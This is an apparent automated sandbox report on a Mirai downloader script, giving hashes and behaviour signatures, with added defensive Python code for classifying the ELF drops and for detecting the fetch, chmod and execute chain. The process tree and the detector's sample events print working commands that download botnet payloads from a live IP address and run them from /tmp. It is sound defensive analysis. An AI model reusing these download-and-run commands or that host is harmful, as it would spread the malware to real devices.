Analysis

  • max time kernel
    149s
  • max time network
    175s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    29-08-2024 20:19

General

  • Target

    sora.sh

  • Size

    1KB

  • MD5

    4bad6b7a8f3a112f1e8a64415b2c5e57

  • SHA1

    80386ebec3b511cd2a07da88e300a62590b8d889

  • SHA256

    4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77

  • SHA512

    da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large number (18459) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the hardware watchdog to prevent it from restarting an infected system.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information, which may indicate whether the system is a virtual machine.

  • Reads runtime system information 51 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.
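The downloader fetches one payload per architecture (sora.x86, sora.mips, sora.mpsl, sora.arm4 through sora.arm7, sora.ppc, sora.m68k, sora.sh4) and the UPX signature above fires on four of the drops. The helper below is an added triage example, not part of this report or of the sandbox: it reads the ELF identification header to label a dropped file with the same architecture names the downloader uses, and checks for the UPX marker strings. The header bytes it is fed are constructed fixtures, not the real binaries from the Downloads section; the e_machine table and the marker strings are standard UPX/ELF values.

```python
"""Classify a dropped ELF by architecture and check for the UPX marker.

Added example (not part of the sandbox report). make_header() builds
constructed minimal ELF headers for testing; the real payloads from the
report are not embedded here.
"""
import struct

ELF_MAGIC = b"\x7fELF"

# ELF e_machine values, mapped to the arch suffixes used by the downloader.
# MIPS is split by endianness below: big-endian -> "mips", little -> "mpsl".
E_MACHINE = {
    0x03: "x86",
    0x08: "mips",
    0x28: "arm",
    0x14: "ppc",
    0x04: "m68k",
    0x2A: "sh4",
}

# Stock UPX leaves both strings in the packed file; modified UPX builds
# often strip the short "UPX!" tag, so check for either one.
UPX_MARKERS = (b"UPX!", b"$Info: This file is packed with the UPX")


def classify_elf(data: bytes) -> dict:
    """Return {'arch', 'bits', 'endian', 'upx'} for an ELF blob, else raise ValueError."""
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    bits = {1: 32, 2: 64}.get(data[4])       # EI_CLASS
    endian = {1: "little", 2: "big"}.get(data[5])  # EI_DATA
    if bits is None or endian is None:
        raise ValueError("bad EI_CLASS/EI_DATA")
    fmt = "<H" if endian == "little" else ">H"
    (e_machine,) = struct.unpack_from(fmt, data, 18)  # same offset for ELF32/ELF64
    arch = E_MACHINE.get(e_machine, f"unknown(0x{e_machine:x})")
    if arch == "mips" and endian == "little":
        arch = "mpsl"
    upx = any(marker in data for marker in UPX_MARKERS)
    return {"arch": arch, "bits": bits, "endian": endian, "upx": upx}


def make_header(ei_class: int, ei_data: int, e_machine: int, trailer: bytes = b"") -> bytes:
    """Constructed 52-byte ELF header fixture (test input only, not a real binary)."""
    fmt = "<" if ei_data == 1 else ">"
    hdr = ELF_MAGIC + bytes([ei_class, ei_data, 1]) + b"\x00" * 9   # e_ident (16 bytes)
    hdr += struct.pack(fmt + "HHI", 2, e_machine, 1)                  # e_type, e_machine, e_version
    return hdr.ljust(52, b"\x00") + trailer


if __name__ == "__main__":
    # Constructed samples covering the downloader's architecture list.
    fixtures = {
        "sora.x86":  make_header(1, 1, 0x03),
        "sora.mips": make_header(1, 2, 0x08),
        "sora.mpsl": make_header(1, 1, 0x08, b"UPX!"),
        "sora.arm7": make_header(1, 1, 0x28),
        "sora.ppc":  make_header(1, 2, 0x14),
        "sora.m68k": make_header(1, 2, 0x04),
        "sora.sh4":  make_header(1, 1, 0x2A),
    }
    for name, blob in fixtures.items():
        print(name, classify_elf(blob))
```

Run it over the files recovered from /tmp instead of the fixtures to see which of the six /tmp/robben versions matches the sandbox's own architecture (armhf here). The 212-byte /tmp/robben in the Downloads section is too small to be an ELF payload and fails the magic check, which is itself worth flagging. An absent marker does not prove a file is unpacked: the report's signature name, "UPX/modified UPX", is a reminder that the tag is often removed.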

Processes

  • /tmp/sora.sh
    /tmp/sora.sh
    1⤵
    • Writes file to tmp directory
    PID:650
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.x86
      2⤵
      • Writes file to tmp directory
      PID:652
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:705
    • /bin/cat
      cat sora.x86
      2⤵
      PID:715
    • /bin/chmod
      chmod +x robben sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:717
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:720
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.mips
      2⤵
      • Writes file to tmp directory
      PID:722
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.mips
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:731
    • /bin/cat
      cat sora.mips
      2⤵
      PID:733
    • /bin/chmod
      chmod +x robben sora.mips sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:734
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:735
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.mpsl
      2⤵
      • Writes file to tmp directory
      PID:738
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.mpsl
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:741
    • /bin/cat
      cat sora.mpsl
      2⤵
      PID:749
    • /bin/chmod
      chmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:751
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:752
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.arm4
      2⤵
      PID:754
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.arm4
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:761
    • /bin/cat
      cat sora.arm4
      2⤵
      PID:766
    • /bin/chmod
      chmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:768
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:769
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.arm5
      2⤵
      • Writes file to tmp directory
      PID:771
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.arm5
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:778
    • /bin/cat
      cat sora.arm5
      2⤵
      PID:781
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:782
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:783
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.arm6
      2⤵
      • Writes file to tmp directory
      PID:784
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.arm6
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:785
    • /bin/cat
      cat sora.arm6
      2⤵
      PID:786
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:787
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Reads runtime system information
      PID:788
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.arm7
      2⤵
      • Writes file to tmp directory
      PID:789
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.arm7
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:790
    • /bin/cat
      cat sora.arm7
      2⤵
      PID:791
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:792
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Reads runtime system information
      PID:793
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.ppc
      2⤵
      • Writes file to tmp directory
      PID:797
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.ppc
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:801
    • /bin/cat
      cat sora.ppc
      2⤵
      PID:802
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:803
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:804
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.m68k
      2⤵
      • Writes file to tmp directory
      PID:806
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.m68k
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:807
    • /bin/cat
      cat sora.m68k
      2⤵
      PID:808
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:809
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:810
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.sh4
      2⤵
      • Writes file to tmp directory
      PID:812
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.sh4
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:815
    • /bin/cat
      cat sora.sh4
      2⤵
      PID:816
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
      2⤵
      PID:817
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:818
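The tree above is the classic Mirai stager loop: for each architecture, fetch the payload over plain HTTP from a bare-IP host into /tmp (wget, then curl -O as a fallback), chmod +x everything in the directory, and run it as ./robben. Only the arm7 iteration (PID 793) carries the "Modifies Watchdog functionality" signature, which is consistent with the armhf sandbox: that is the one build that can actually run here. The script below is an added detection example, not part of this report or of the sandbox. It takes execution records as (ppid, pid, cwd, argv) tuples, an assumed format you would map your own auditd EXECVE or EDR fields onto, and flags any parent whose children complete the fetch -> chmod +x -> execute chain inside /tmp, collecting the download URLs and executed paths as IOCs. SAMPLE_EVENTS is constructed from three of the iterations above (x86, mips, arm7, with the report's PIDs and commands, chmod argument lists abbreviated) plus one benign control.

```python
"""Detect a Mirai-style fetch -> chmod +x -> execute chain in /tmp.

Added example, not part of the sandbox report. Record format
(ppid, pid, cwd, argv) is an assumption for the example.
"""
import re
from collections import defaultdict

# Download URL whose host is a bare IPv4 address, as in the report.
RAW_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S*")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}

SAMPLE_EVENTS = [  # constructed from the report's process tree (chmod lists abbreviated)
    (650, 652, "/tmp", ["wget", "http://154.216.17.67/bins/sora.x86"]),
    (650, 705, "/tmp", ["curl", "-O", "http://154.216.17.67/bins/sora.x86"]),
    (650, 715, "/tmp", ["cat", "sora.x86"]),
    (650, 717, "/tmp", ["chmod", "+x", "robben", "sora.sh", "sora.x86"]),
    (650, 720, "/tmp", ["./robben", "Payload"]),
    (650, 722, "/tmp", ["wget", "http://154.216.17.67/bins/sora.mips"]),
    (650, 731, "/tmp", ["curl", "-O", "http://154.216.17.67/bins/sora.mips"]),
    (650, 733, "/tmp", ["cat", "sora.mips"]),
    (650, 734, "/tmp", ["chmod", "+x", "robben", "sora.mips", "sora.sh", "sora.x86"]),
    (650, 735, "/tmp", ["./robben", "Payload"]),
    (650, 789, "/tmp", ["wget", "http://154.216.17.67/bins/sora.arm7"]),
    (650, 790, "/tmp", ["curl", "-O", "http://154.216.17.67/bins/sora.arm7"]),
    (650, 791, "/tmp", ["cat", "sora.arm7"]),
    (650, 792, "/tmp", ["chmod", "+x", "robben", "sora.arm7", "sora.sh"]),
    (650, 793, "/tmp", ["./robben", "Payload"]),
    # benign control (constructed): hostname URL, not in /tmp, must not alert
    (900, 901, "/home/admin", ["curl", "-O", "https://example.org/tool.sh"]),
    (900, 902, "/home/admin", ["chmod", "+x", "tool.sh"]),
    (900, 903, "/home/admin", ["./tool.sh"]),
]


def grants_exec(mode: str) -> bool:
    """True if a chmod mode string adds an execute bit (symbolic or octal)."""
    if re.fullmatch(r"[ugoa]*\+[rwxst]*x[rwxst]*", mode):
        return True
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return any(int(d) & 1 for d in mode[-3:])
    return False


def classify(event):
    """Map one record to ('fetch', url) | ('chmod', None) | ('exec', path) | (None, None)."""
    _ppid, _pid, cwd, argv = event
    in_tmp = cwd == "/tmp" or cwd.startswith("/tmp/")
    prog = argv[0].rsplit("/", 1)[-1]
    if prog in FETCHERS and in_tmp:
        for arg in argv[1:]:
            if RAW_IP_URL.fullmatch(arg):
                return "fetch", arg
    if prog == "chmod" and in_tmp and any(grants_exec(a) for a in argv[1:]):
        return "chmod", None
    # Resolve "./name" against cwd so an exec out of /tmp is caught either way.
    target = cwd.rstrip("/") + "/" + argv[0][2:] if argv[0].startswith("./") else argv[0]
    if target.startswith("/tmp/"):
        return "exec", target
    return None, None


def detect_fetch_and_run(events):
    """Return {ppid: {'chains', 'urls', 'hosts', 'executed'}} for parents completing the chain."""
    state = defaultdict(lambda: {"stage": 0, "urls": [], "executed": [], "chains": 0})
    for ev in sorted(events, key=lambda e: e[1]):  # PID order stands in for time order here
        kind, value = classify(ev)
        s = state[ev[0]]
        if kind == "fetch":                 # stage 1: payload pulled into /tmp
            s["urls"].append(value)
            s["stage"] = max(s["stage"], 1)
        elif kind == "chmod" and s["stage"] == 1:   # stage 2: made executable
            s["stage"] = 2
        elif kind == "exec" and s["stage"] == 2:    # chain complete: run from /tmp
            s["executed"].append(value)
            s["chains"] += 1
            s["stage"] = 0                  # next iteration starts with a fresh fetch
    hits = {}
    for ppid, s in state.items():
        if s["chains"]:
            hosts = {RAW_IP_URL.fullmatch(u).group(1) for u in s["urls"]}
            hits[ppid] = {"chains": s["chains"], "urls": s["urls"],
                          "hosts": hosts, "executed": s["executed"]}
    return hits


if __name__ == "__main__":
    for ppid, hit in detect_fetch_and_run(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {hit['chains']} fetch-and-run chain(s), "
              f"hosts {sorted(hit['hosts'])}, executed {sorted(set(hit['executed']))}")
```

The rule keys on three things that are cheap to log and hard for this family to avoid: a bare-IP download URL, a working directory under /tmp, and an exec of a file in /tmp that was just made executable. Keying on cwd alone misses `wget -O /tmp/x` run from elsewhere, so when you adapt it, also treat a -O/-o argument under /tmp as a fetch into /tmp, and consider /dev/shm and /var/tmp as equivalent staging directories.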

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/robben
    Filesize
    30KB
    MD5
    bcff8f405bdd93b8488e6f6aca117a32
    SHA1
    8b32a1dea70be2c76830e3808f70ad62eb3b1250
    SHA256
    67180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396
    SHA512
    5d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a

  • /tmp/robben
    Filesize
    31KB
    MD5
    131fc41fbe66493277e3155f50b9fce5
    SHA1
    0bbb17cb882e34dc82e51862f8245f3187664beb
    SHA256
    d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f
    SHA512
    de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247

  • /tmp/robben
    Filesize
    33KB
    MD5
    8652e70ebc913d0078f59b2526a40d36
    SHA1
    1227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4
    SHA256
    cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf
    SHA512
    ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3

  • /tmp/robben
    Filesize
    212B
    MD5
    45e588171939a0780c48755918b1cd74
    SHA1
    6c33e64b1a43fb6752026fd1254cac740e7c3243
    SHA256
    770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535
    SHA512
    fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770

  • /tmp/robben
    Filesize
    27KB
    MD5
    00d6529558e66184baaf1b0f21e59739
    SHA1
    3b9db5227c48f501573ea9b626c5c765a17e7c61
    SHA256
    fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d
    SHA512
    49f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb

  • /tmp/robben
    Filesize
    71KB
    MD5
    a0b83eba33da68f09402235338d316a8
    SHA1
    15f3e890997e3b7f21c16eb1b0462bdf4ed11d61
    SHA256
    eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507
    SHA512
    2346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79